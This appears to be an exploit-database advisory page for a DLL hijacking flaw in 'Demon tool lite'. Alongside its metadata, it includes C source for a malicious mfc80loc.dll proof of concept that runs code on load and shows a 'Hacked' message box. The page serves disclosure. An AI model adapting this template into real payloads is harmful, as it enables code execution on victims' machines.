Demon tool lite DLL Hijacking Exploit (mfc80loc.dll)

vendor:

Demon tool lite

by:

Mohamed Clay

7,2

CVSS

HIGH

DLL Hijacking

427

CWE

Product Name: Demon tool lite

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP

2009

Demon tool lite DLL Hijacking Exploit (mfc80loc.dll)

Demon tool lite is vulnerable to DLL Hijacking. An attacker can place a malicious mfc80loc.dll in the same folder as a .mds file and execute the .mds file in Demon tool lite. This will cause the malicious DLL to be executed, resulting in arbitrary code execution.

Mitigation:

Ensure that all applications are up to date and patched with the latest security updates.

Source

Exploit-DB raw data:

/*
#Demon tool lite DLL Hijacking Exploit (mfc80loc.dll)
#Author : Mohamed Clay
#Greetz : linuxac.org && isecur1ty.org && security4arabs.com && v4-team.com && all My Friends
#note : EveryOne is happy with DLL Hijacking YooooPiiii!!!!
#Tested on: Windows XP

#How to use : Place a .mds file and mfc80loc.dll in same folder and execute .mds file in
#Demon tool lite.

#mfc80loc.dll (code)
*/

#include "stdafx.h"

void init() {
MessageBox(NULL,"Mohamed Clay", "Hacked",0x00000003);
}


BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
 )
{
    switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
 init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
break;
    }
    return TRUE;
}